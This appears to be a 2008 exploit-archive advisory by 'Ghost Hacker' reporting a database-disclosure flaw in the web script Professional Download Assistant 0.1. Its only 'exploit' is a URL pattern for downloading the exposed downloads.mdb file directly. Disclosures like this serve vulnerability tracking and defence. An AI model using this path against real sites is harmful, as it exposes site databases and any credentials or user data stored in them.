id: 4376
date: 12/07/2008
title: Professional Download Assistant 0.1 Database Disclosure Vulnerability
author: Ghost Hacker
cves: 

=====================================================================
Professional Download Assistant 0.1 Database Disclosure Vulnerability
=====================================================================


####################################################################################################
# Professional Download Assistant (downloads.mdb) Database Disclosure Vulnerability                #
####################################################################################################
#[~] Author : Ghost Hacker                                                                         #
#[~] Bug : Database Disclosure                                                                     #
#[~] Name Script : Professional Download Assistant                                                 #
#[~] Download : http://www.dotnetindex.com/downloads/easy_download_getinfo.asp?id=8                #
####################################################################################################
#[~]Exploit                                                                                        #
# http://xxxx.com/[path]/database/downloads.mdb                                                    #
##################################### ###############################################################



#  0day.today [2023-03-24]  #